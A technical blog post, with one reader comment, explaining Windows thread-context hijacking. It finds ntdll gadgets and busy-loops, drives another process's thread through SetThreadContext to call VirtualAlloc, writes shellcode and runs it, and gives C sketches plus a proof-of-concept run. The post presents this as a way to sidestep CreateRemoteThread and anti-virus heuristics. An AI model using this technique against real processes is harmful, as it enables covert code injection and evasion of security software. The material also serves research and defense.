Context Thread ALL The Things

Abstract

In today’s post we will discuss various methods to alter memory, execute
machine code, inject (system) calls, and more in another process, using
only the Windows thread context API.

Throughout the next paragraphs we will introduce the reader to the concept
of thread context, why we will use the thread context API instead of the
existing API, how we will use it to perform functionality as provided
by existing APIs (without actually using those), some improvements to the
technique, and x64 support.

Finally, we present the reader with source and binaries of the methods
described, as well as a Proof of Concept which allocates an executable
page in another process, writes some shellcode to it, and executes it.

Introduction

The thread context denotes the state of a thread. It stores the values
of the general purpose registers [1], the instruction pointer (or
program counter), the eflags register [2], the floating point registers,
and more [3]. However, in this post, we are only interested in
the general purpose registers and the instruction pointer.

Each thread has its own thread context. By altering the thread context
of another thread, we can change the execution flow of this particular
thread. We will use this technique to our advantage in order to execute
code as we like. But first, why would we want to?

Note: A friend of mine, Echo, already wrote a good Proof of Concept a
few years ago which illustrates most of the techniques explained in
this post. Feel free to check his code as well ;)

Second Note: if anything is still unclear after reading this post, try
reading the Proof of Concept code as well. Every step is heavily commented.

Why?

You might wonder why one would use techniques described in this post
instead of using the normal functions which result in the same
functionality.

For starters, because you can (or at least you can after reading this post.)
Besides that, the normal functions appear to have funky side-effects on
newer versions of Windows; CreateRemoteThread, for example, is limited on
Windows 7 [4].
And last, but not least, certain APIs which we will be emulating are
flagged as malicious by software such as anti-virus products. By applying
the techniques described in this post, we may or may not bypass these
anti-virus heuristics and/or any limitations imposed by such software.

Thread Context Hijacking 101

So what does it take in order to hijack the thread context of another
thread, and use it in such a way that it does our thing?

First of all, one has to obtain a handle to the thread which we
want to hijack. This can be done in one of the following ways (btw, this
is not a list of all possible methods.)

  • Enumerating Threads of a Process, followed by an OpenThread [5] call
  • Retrieve Thread Identifier based on a Window Name, using
    GetWindowThreadProcessId [6], followed by an OpenThread call
  • Retrieve Thread Handle after creating a new process, using
    CreateProcess [7]
  • Iterate through all Thread Handles of a process using NtGetNextThread [8]
    (after obtaining a process handle using e.g. NtGetNextProcess [8])

Once we have obtained a thread handle using our favourite method, we can
start with hijacking.

Before we do anything with the thread context, we have to suspend the
thread, otherwise the behaviour of the thread context API is undefined.
(Think about it, why would you want to overwrite registers in a running
thread?)

After suspending the thread, we can obtain the thread context, modify it,
store the new thread context, and resume the thread (make the thread run
again.) We can do this as often as we want. In other words, we can resume
the thread for example five times with registers set as we like, and after
that restore the original thread context. By resuming and suspending the
thread a few times with registers set to our values, we can manipulate the
memory of the process.

In order to find gadgets that will work in the remote process, we will be
using a shared library. That is, a library that we can scan in our own
process, which (optimally) has the same base address in the other process.
On Windows, the best example of this would be ntdll.dll, since it
is always loaded in a process. That being said, all of our work will be
done on the ntdll.dll library.

Gadgets

In order to manipulate the memory in the other process, we have
to find so-called gadgets. Before we dive into specific gadgets
for different operations, we will first examine what exactly gadgets do.

Usually a gadget will perform one particular operation (such as writing data
to a register or address) and after that jump to the next gadget. In other
words, a gadget is a really, really basic sequence of instructions
(usually two to at most 10 instructions.)
For more information regarding gadgets, you could read some more on
topics such as Return Oriented Programming [9].

A gadget must meet the following requirements to be usable.

  • We must control all input variables
  • With the same input, the output must always be the same
  • The gadget must return into a location controlled by us

To match the first criterion, we must find a gadget which uses only
registers as input. We don’t control the stack directly, so we should not use
gadgets which read from the stack. (An exception to this will be presented
later though.)

The second criterion states that the gadget should always perform the same
operations given the same input. In other words, the gadget cannot contain
any conditional jumps (and for simplicity, we also ignore relative jumps.)

Finally, the third criterion, which is pretty interesting, states that the
gadget should always return to an address controlled by the attacker. This
is because we somehow want to know when the gadget has finished execution.
A very reliable method to do this is by jumping to or returning into a
busy-loop, an instruction that jumps to itself. What happens now is that
the thread will, after executing the gadget, run into an infinite loop.
As the attacker we can request the instruction pointer of the thread (by
obtaining the thread context), and we know the address of the infinite loop
(as we told the thread to go there), so we can simply wait until the
thread has reached the loop. Once we see that the instruction pointer is
at the infinite loop, we know that the gadget has finished execution, and
we can suspend the thread again.
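
The wait-for-the-busy-loop idea can be sketched roughly as follows. This is
not the Proof of Concept's code: regs_t, thread_ops_t and the fake_* helpers
are hypothetical names made up for this sketch. On Windows the four callbacks
would presumably wrap SuspendThread, ResumeThread, GetThreadContext and
SetThreadContext; here a simulated thread stands in so the sketch compiles
anywhere.

```c
#include <stdint.h>

/* Minimal register file: a stand-in for the relevant CONTEXT fields. */
typedef struct { uint32_t eax, ebx, esp, eip; } regs_t;

/* Hypothetical backend (an assumption of this sketch, not a real API). */
typedef struct {
    void *thread;
    void (*suspend)(void *thread);
    void (*resume)(void *thread);
    void (*get_regs)(void *thread, regs_t *out);
    void (*set_regs)(void *thread, const regs_t *in);
} thread_ops_t;

/* Starts an already suspended thread with the given registers and polls
 * until its instruction pointer sits on the busy-loop. Returns 1 on success
 * (final registers in *result), 0 if max_polls ran out. Either way the
 * thread is handed back suspended. */
int run_until_busy_loop(const thread_ops_t *t, const regs_t *start,
                        uint32_t busy_loop, unsigned max_polls,
                        regs_t *result)
{
    t->set_regs(t->thread, start);
    t->resume(t->thread);
    for (unsigned i = 0; i < max_polls; i++) {
        /* Suspend before every read so the context we inspect is stable. */
        t->suspend(t->thread);
        t->get_regs(t->thread, result);
        if (result->eip == busy_loop)
            return 1;
        t->resume(t->thread);
    }
    t->suspend(t->thread);
    return 0;
}

/* Simulated thread: every resume() counts as one time slice, and after
 * slices_needed of them the "gadget" is done and eip parks on the loop. */
typedef struct {
    regs_t regs;
    uint32_t busy_loop;
    unsigned slices_needed;
    int suspend_count;
} fake_thread_t;

static void fake_suspend(void *p) { ((fake_thread_t *)p)->suspend_count++; }

static void fake_resume(void *p)
{
    fake_thread_t *f = p;
    f->suspend_count--;
    if (f->slices_needed > 0 && --f->slices_needed == 0)
        f->regs.eip = f->busy_loop;
}

static void fake_get(void *p, regs_t *out) { *out = ((fake_thread_t *)p)->regs; }
static void fake_set(void *p, const regs_t *in) { ((fake_thread_t *)p)->regs = *in; }

/* Convenience constructor for the simulated backend. */
thread_ops_t fake_ops(fake_thread_t *f)
{
    thread_ops_t ops = { f, fake_suspend, fake_resume, fake_get, fake_set };
    return ops;
}
```

One design choice here: the sketch suspends the thread before every context
read instead of reading the context of a running thread, and it gives up
after max_polls attempts so that a gadget which never returns does not hang
the attacker as well.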

Busy Loops

Before we examine the gadgets further, let’s first see what a busy-loop
is, and how we would use it in x86.

As mentioned earlier, a busy-loop is an instruction that jumps to itself.
More specifically, in x86, we use the jmp short instruction. This
is an unconditional jump with an 8bit relative offset, which is calculated
in such a way, that it points to the beginning of the instruction.
(Actually it’s called just jmp, but to make it clear that we want
an 8bit relative offset, we say jmp short.)

In assembly the instruction looks like one of the following
representations.

jmp short $

loop:
    jmp short loop

This instruction is only two bytes long and therefore quite easily found
in a large library such as ntdll. Actually, the ntdll version shipped
with x86_64 Windows 7 SP1 contains 13 busy-loops.
As one is more than enough for us, this will do just fine.
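
Finding such a busy-loop boils down to a two-byte search: jmp short with a
relative offset of -2 encodes as the bytes EB FE. A minimal sketch, assuming
the executable section of the library has already been copied into a buffer
(find_busy_loop is a name made up for this example):

```c
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first `jmp short $` (bytes EB FE) in buf,
 * or -1 if the buffer does not contain one. */
long find_busy_loop(const uint8_t *buf, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++) {
        if (buf[i] == 0xEB && buf[i + 1] == 0xFE)
            return (long)i;
    }
    return -1;
}
```

Adding the returned offset to the base address of the scanned section gives
the address to use as return address for the gadgets. Note that the two bytes
do not have to be an instruction the compiler emitted on purpose; any place
where EB FE happens to occur in executable memory will do.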

Read & Write Gadgets

We have seen what criteria a gadget must meet. Now it’s time to examine
the gadgets which we will be using. We need two different types of gadgets.

  • Read Gadget → read 32bits of data (one dword)
  • Write Gadget → write 32bits of data (one dword)

Using only these two gadgets, we will be able to do anything we want (as
we will see later.)

Now that we’ve defined the types of gadgets, we have to figure out what a
gadget looks like that fulfills all three criteria.

The first criterion is fairly simple: we are only looking for gadgets which
contain an instruction that reads the value at an address into a register,
or writes data to an address.

For a reading gadget, the following instruction will do. (It obtains the
32bit integer at an address specified by ebx and stores it into
eax, we can later retrieve the value in eax from the thread
context.)

mov eax, dword [ebx]

For a writing gadget, we reverse the operands in the mov instruction,
resulting in the following instruction. (Writes the 32bit integer in
eax to the address specified by ebx.)

mov dword [ebx], eax

The second criterion, output is always the same for a specified input,
is fairly easy to meet if we keep the gadgets as simple as possible.
(That is, no conditional stuff etc.)

This brings us to the last criterion: we have to be able to control where
the gadget returns after execution. There are two easy ways to do this.

  • By jumping to an address specified in a general purpose register
  • Using a return instruction on a stack value we have overwritten

The first method is the easiest and, including the read gadget, may look
like the following. (Where ecx holds an address specified by
us.) Unfortunately, our search did not turn up a single gadget of this
form, but it’s still a nice technique to keep in mind.

mov eax, dword [ebx]
jmp ecx

Although we used hardcoded registers in this example, any register should
do (as long as the source or destination operand in the mov
instruction is not the same as the address register in the jmp
instruction.)

For example, the following example is not a valid gadget
for us (because the ebx register is referenced twice.)

mov eax, dword [ebx]
jmp ebx

The second method involves setting up the stack in such a way that it holds
the address to which we want to jump, and then executing a return instruction.
This method requires us to do an additional 32bit write before we can do
any other reads, writes or other stuff (because we have to initialize the
stack with our return address.) A simple example follows (with a
write gadget.)

mov dword [ebx], eax
retn

Note that, in this case, the source and destination operand of the
mov instruction cannot be esp (because that’s where
retn gets its return address, unless that’s what you want.)
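
To give an idea of what searching for such a gadget involves, here is a
rough sketch that scans a byte buffer for the simplest form only: a mov with
a plain [register] operand directly followed by retn. The opcodes are the
standard x86 ones (8B for mov r32, r/m32, 89 for mov r/m32, r32, C3 for
retn); the gadget_t struct and find_mov_ret are names invented for this
example, and the real Proof of Concept supports more forms than this.

```c
#include <stddef.h>
#include <stdint.h>

enum { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI };  /* x86 register numbers */

typedef struct {
    size_t offset;  /* where the gadget starts in the scanned buffer */
    int is_write;   /* 1: mov [addr_reg], data_reg  0: mov data_reg, [addr_reg] */
    int addr_reg;   /* register holding the address */
    int data_reg;   /* register holding (or receiving) the dword */
} gadget_t;

/* Finds the first mov + retn pair of the requested kind. Only the simplest
 * ModRM form (mod = 00, no SIB byte, no displacement) is matched.
 * Returns 1 and fills *out on success, 0 otherwise. */
int find_mov_ret(const uint8_t *buf, size_t len, int want_write, gadget_t *out)
{
    uint8_t opcode = want_write ? 0x89 : 0x8B;
    for (size_t i = 0; i + 2 < len; i++) {
        if (buf[i] != opcode || buf[i + 2] != 0xC3)
            continue;
        uint8_t modrm = buf[i + 1];
        int mod = modrm >> 6, reg = (modrm >> 3) & 7, rm = modrm & 7;
        /* With mod = 00, rm = 100 means a SIB byte follows and rm = 101
         * means an absolute disp32, so neither is a plain [register]. */
        if (mod != 0 || rm == 4 || rm == 5)
            continue;
        /* retn takes its return address from esp, so leave esp alone. */
        if (reg == ESP)
            continue;
        out->offset = i;
        out->is_write = want_write;
        out->addr_reg = rm;
        out->data_reg = reg;
        return 1;
    }
    return 0;
}
```

For the bytes 8B 03 C3 this reports a read gadget with ebx as the address
register and eax as the data register, i.e. mov eax, dword [ebx] followed by
retn.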

Volatile Registers

One problem that came up during testing was the following.

When hijacking the thread context of a thread that did a simple infinite
loop, there were no problems, and the message box (see the
Proof of Concept section) was shown correctly.
However, after adding a call to Sleep in the loop, problems
occurred. That is, the registers in the write gadget were corrupted.

This has to do with non-volatile registers. Out of the eight
general purpose registers, four are labeled as non-volatile
(ebx, ebp, esi and edi.) Non-volatile registers are preserved
across function calls, whereas a register such as eax is always
clobbered because the return value of the function is stored in it.

This is likely not the entire explanation, by far, but if anyone knows
more about this particular subject, please do leave a comment.

Anyway, basically if we want to be able to hijack threads which might be
in a blocking system call (e.g. Sleep [10]), then we are limited to
gadgets which use only non-volatile registers. Fortunately for us this
doesn’t cause too many problems, as there are plenty of gadgets left.
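
Filtering gadgets on this property is a matter of looking at the two
registers encoded in the ModRM byte of the mov instruction. The sketch below
is only an illustration under that assumption (both function names are made
up), and it rejects the addressing forms it does not understand rather than
guessing.

```c
#include <stdint.h>

enum { EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI };  /* x86 register numbers */

/* 1 if reg is one of the four registers listed above as non-volatile. */
int is_nonvolatile(int reg)
{
    return reg == EBX || reg == EBP || reg == ESI || reg == EDI;
}

/* Takes the ModRM byte of a `mov reg, [rm]` or `mov [rm], reg` gadget and
 * returns 1 if both the data and the address register are non-volatile. */
int uses_only_nonvolatile(uint8_t modrm)
{
    int mod = modrm >> 6, reg = (modrm >> 3) & 7, rm = modrm & 7;
    if (mod == 3)            return 0;  /* register to register, no memory */
    if (rm == 4)             return 0;  /* SIB byte follows, not handled here */
    if (mod == 0 && rm == 5) return 0;  /* absolute disp32, no base register */
    return is_nonvolatile(reg) && is_nonvolatile(rm);
}
```

As a sanity check, ModRM byte 7D (edi with [ebp+disp8]) and 7B (edi with
[ebx+disp8]) both pass, which matches the kind of gadgets the Proof of
Concept ends up picking in the example run at the end of this post.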

Injecting Function Calls

As we can now read any value from the process and write any value to the
process (you could chain multiple write commands in order to write more
than four bytes), it is now time to look into function calling in the
other process.

A function call is basically setting up the stack
correctly and jumping to the function address, this is exactly what we
will be doing.

Let’s assume that we want to call VirtualAlloc [11] in the other process,
rather than calling VirtualAllocEx [12] in our own process. (See the
difference? Using VirtualAlloc you can allocate memory in your own process,
whereas VirtualAllocEx is able to allocate memory in another process.
VirtualAlloc is like mmap(2) [13].)

As you can see on the MSDN page (follow the link in the footnote),
VirtualAlloc takes four parameters. What we will do is the
following.

  • We will allocate enough space for these four parameters and
    the return address (where code execution will continue after finishing
    the function call) on the stack
  • We will write the four parameters to the corresponding location on the
    stack
  • We will write the address of a busy-loop as return address
  • And finally, we will call the function

First of all we will allocate enough space on the stack. Assuming that the
remote thread has a normal stack layout, that is, esp points to the
lowest stack address currently in use, we can simply subtract our needed
space from the esp register. In order to call VirtualAlloc we need
to store five values on the stack (four parameters and the return
address.) In other words, we will be writing our parameters/data at
esp-20, where 20 represents five 32bit integers.

Now it’s time to write our data on the allocated stack space. We do this
by using our write gadgets five times in a row. So this is actually pretty
easy, once the correct gadgets have been found.

After we prepare the other thread for the particular function call, it
is now time to execute the function. We do this by pointing esp to
the address we calculated earlier (e.g. esp-20 in our example) and
besides that, we set the instruction pointer to the address of the
function we want to call.

From there on, after resuming the thread, the function will be executed
and arrive in the busy-loop after finishing. We have now successfully
executed the function, and we can read the return value in the eax
register in the thread context.
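
The stack layout described above can be computed up front, before touching
the remote thread. The following sketch only plans the writes; performing
them is left to the write gadget. The write_t struct and plan_call_frame are
hypothetical names for this example.

```c
#include <stddef.h>
#include <stdint.h>

/* One dword to be written into the remote process by a write gadget. */
typedef struct { uint32_t addr, value; } write_t;

/* Plans the dword writes for an x86 call with all parameters on the stack.
 * writes[] must have room for nargs + 1 entries. Returns the value esp
 * should have when the instruction pointer is set to the function. */
uint32_t plan_call_frame(uint32_t esp, uint32_t ret_addr,
                         const uint32_t *args, size_t nargs, write_t *writes)
{
    uint32_t new_esp = esp - 4 * (uint32_t)(nargs + 1);

    /* The return address sits at [esp], exactly as after a call. */
    writes[0].addr = new_esp;
    writes[0].value = ret_addr;

    /* The parameters follow, first parameter at the lowest address. */
    for (size_t i = 0; i < nargs; i++) {
        writes[i + 1].addr = new_esp + 4 * (uint32_t)(i + 1);
        writes[i + 1].value = args[i];
    }
    return new_esp;
}
```

For VirtualAlloc(NULL, 0x1000, MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE) the args array would be { 0, 0x1000, 0x3000, 0x40 },
which together with the busy-loop address as ret_addr gives the five writes
and the esp-20 mentioned above.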

Note that some functions write output data to a memory address given by a
pointer, e.g. sprintf [14]. In this case one could read the output data
from the address by chaining one or more read gadgets.

More Robust Gadgets

The gadgets presented earlier are as basic as they come, however, since we
want our attack to be fairly robust, we will support somewhat more
advanced gadgets as well. This is because the library in the other process
(we use ntdll.dll) might not contain the basic gadgets.

Advanced mov instruction

So, let’s start with supporting mov instructions which take more
registers in the memory address.

mov ebx, dword [esi+eax*2+0x20]

In order to support this gadget, we will most likely zero the eax
register, subtract 0x20 from the address, and store the result in
esi. However, if that’s not possible (e.g. this gadget is followed
by a jmp instruction with esi as the register to jump to), then
we will have to do some additional calculations (e.g.
eax = (address - esi - 0x20) / 2, which only works when
address - esi - 0x20 is even.)
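
Both cases come down to solving address = base + index*scale + disp for the
registers we are free to choose. A small sketch of that arithmetic, with
function names invented for this example:

```c
#include <stdint.h>

/* Case 1: the base register is free. Zero the index register and put
 * the returned value in the base register. */
uint32_t solve_base(uint32_t address, uint32_t disp)
{
    return address - disp;
}

/* Case 2: the base register is pinned (e.g. it doubles as jump target).
 * Solves for the index register instead. Returns 1 and stores the result
 * in *index if a solution exists, 0 otherwise. The arithmetic wraps modulo
 * 2^32, just like the address calculation on the CPU does. */
int solve_index(uint32_t address, uint32_t base, uint32_t scale,
                uint32_t disp, uint32_t *index)
{
    uint32_t rest = address - base - disp;
    if (scale == 0 || rest % scale != 0)
        return 0;
    *index = rest / scale;
    return 1;
}
```

With the gadget above (scale 2, displacement 0x20), esi pinned at 0x400 and
a target address of 0x1000, solve_index yields eax = 0x5F0, whereas a target
of 0x1001 has no solution because the remainder is odd.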

More encodings for Jump instruction

The following example is an improvement on the jmp instruction.
In this case we use a call instruction instead of a jmp
instruction. This brings a few caveats though; the instructions before the
call can not use the esp register and a 32bit address is pushed on
to the stack (controlled by the esp register.) An example read
gadget follows.

mov eax, dword [ebx]
call esi

Additional encoding for retn

Besides a normal retn instruction, there is also a variant of the
retn instruction which takes a 16bit immediate, indicating how many
extra bytes should be added to esp after popping the return address (in
our case, the address of the busy-loop.) Other than that, the instruction
is not very special, but it is used in functions with the stdcall calling
convention (also referred to as WINAPI on Windows.) A simple example of
such an instruction looks like the following.

retn 4
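
When a gadget ends in this variant, we need to know how far esp has moved by
the time the thread sits in the busy-loop. A minimal sketch of that
calculation, based on the standard encodings (C3 for plain retn, C2 followed
by a little-endian 16bit immediate for retn imm16); ret_stack_adjust is a
name made up for this example:

```c
#include <stddef.h>
#include <stdint.h>

/* Given the bytes of a near return instruction, returns the total number
 * of bytes esp grows by (4 for the popped return address plus the
 * immediate, if any), or -1 if p does not start with a near return. */
int ret_stack_adjust(const uint8_t *p, size_t len)
{
    if (len >= 1 && p[0] == 0xC3)
        return 4;
    if (len >= 3 && p[0] == 0xC2)
        return 4 + (p[1] | (p[2] << 8));
    return -1;
}
```

For retn 4 (bytes C2 04 00) this gives 8, so after the gadget has run esp
is 8 bytes higher than the value we put in the thread context.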

x64 Support

The x64 architecture is slightly different, as is its calling
convention. Whereas x86 throws all parameters on the stack by default,
x64 has a fastcall calling convention [15]. The first four parameters
to a function are passed in general purpose registers (rcx, rdx, r8
and r9), and any other parameters are passed on the stack. In theory this
means that we could write the return address somewhere on the stack (the
busy-loop is exactly the same as in x86) and execute a function such as
VirtualAlloc simply by passing all the parameters in registers in the
thread context.

Practically, however, we might encounter problems regarding non-volatile
registers, etc.

That said, the gadgets for reading and writing remain the same, as their
address registers will be automatically “promoted” to x64 registers. The
main difference is, obviously, that you will be working with 64bit
addresses. (Without a REX.W prefix the same mov encodings still transfer
32 bits of data at a time.)
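
As a rough sketch of the "in theory" part, preparing a call to a function
with up to four parameters on x64 could look like the following. The
register assignment follows the Microsoft x64 calling convention [15]. The
32 bytes of shadow space and the stack alignment are requirements of that
convention which this post does not go into, so treat them as an addition of
this sketch; regs64_t, write64_t and plan_x64_call are hypothetical names.

```c
#include <stdint.h>

/* Stand-in for the relevant fields of the x64 thread context. */
typedef struct { uint64_t rcx, rdx, r8, r9, rsp, rip; } regs64_t;

/* One qword to be written into the remote process. */
typedef struct { uint64_t addr, value; } write64_t;

/* Fills in the registers for a call with four parameters and returns the
 * single memory write that is still needed: the return address. */
write64_t plan_x64_call(regs64_t *regs, uint64_t func, uint64_t ret_addr,
                        const uint64_t args[4])
{
    /* Reserve 8 bytes for the return address plus 32 bytes of shadow
     * space, and make rsp % 16 == 8, as it is right after a call. */
    uint64_t rsp = ((regs->rsp - 40) & ~(uint64_t)15) - 8;
    write64_t w = { rsp, ret_addr };

    regs->rcx = args[0];
    regs->rdx = args[1];
    regs->r8  = args[2];
    regs->r9  = args[3];
    regs->rsp = rsp;
    regs->rip = func;
    return w;
}
```

Compared to x86 this saves four remote writes per call, since only the
return address (again the busy-loop) has to end up in memory.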

Proof of Concept

Up-to-date source of the Proof of Concept can be found here.
Binaries (with source as well) can be found here.

The Proof of Concept basically does what we discussed during this post.
First of all it enumerates all the executable sections in ntdll, then it
looks for possible gadgets in these sections (there is actually only one
section, but still.) From there, after finding a busy-loop, read gadget
and write gadget, it prepares the stack in the remote thread and calls the
VirtualAlloc function to allocate a RWX page (read, write,
execute.) It then copies some shellcode to the page and executes it. This
shellcode is a simple MessageBox call, but then again, it’s just a
Proof of Concept.

Example execution looks like the following:

$ cat target.c
#include <stdio.h>
#include <windows.h>

int main(void)
{
    /* GetCurrentThreadId returns a DWORD, so print it as unsigned long */
    printf("threadid: %lu\n", (unsigned long) GetCurrentThreadId());
    while (1) {
        Sleep(100);
    }
}
$ gcc target.c
$ ./a &
threadid: 9000
$ ./poc 9000
0x77b6b48d read edi dword [ebp+0xffffffe4]
0x77b931ea write dword [ebx+0xffffffe4] edi
Allocated page: 0x00300000
... msgbox pops up ...

References

  1. x86 Architecture – Wikimedia
  2. EFLAGS – Wikipedia
  3. More on x86 – Wikipedia
  4. CreateRemoteThread Limited on Windows 7
  5. OpenThread – MSDN
  6. GetWindowThreadProcessId – MSDN
  7. CreateProcess – MSDN
  8. NtGetNextProcess & NtGetNextThread – Comodo Forums
  9. Return Oriented Programming – Wikipedia
  10. Sleep – MSDN
  11. VirtualAlloc – MSDN
  12. VirtualAllocEx – MSDN
  13. mmap – linux
  14. sprintf – C++.com
  15. x64 Calling Convention – MSDN

One thought on “Context Thread ALL The Things”

  1. neat.

    so, a little bit ago, i was doing nearly the exact same research along the lines of stealing a slice of processor time via thread manipulation in order to keep a continuation alive. while doing this, i also encountered what i think is the exact same problem that you were having during your tests as you’ve explained in your Volatile Registers section.

    while debugging this, i noticed that my register state would be clobbered only if i was modifying the main gui thread of a particular process…and only sometimes. it was inconsistently being messed with. anyways, once i got to this point, i wrote a test-case in an attempt to prove to someone else that i wasn’t crazy. (let me know if you want it for any reason, i imagine your testcase is similar). during my testing, i noticed that win32k was dispatching messages directly into my thread _as soon_ as i resumed execution of the thread thus messing up my register state.

    from debugging, it seemed that the kernel queues up window messages when the thread is paused. so then as soon as your thread gets execution again, the kernel seems to dispatch certain messages via one of the kernel’s xxxDispatchBlahBlah functions into the gui thread. So as soon as your thread resumes execution, these messages will actually be dispatched right before the program counter (eip) you specified is actually executed. and it’s this dispatched code that is actually responsible for mangling the registers that you consider volatile.

    unfortunately, as this was done a while ago. i don’t have the .idb handy to point to where the dispatch call is exactly, but if you’d like to discuss more about it, and perhaps try to conceive of a workaround. feel free to email me directly.
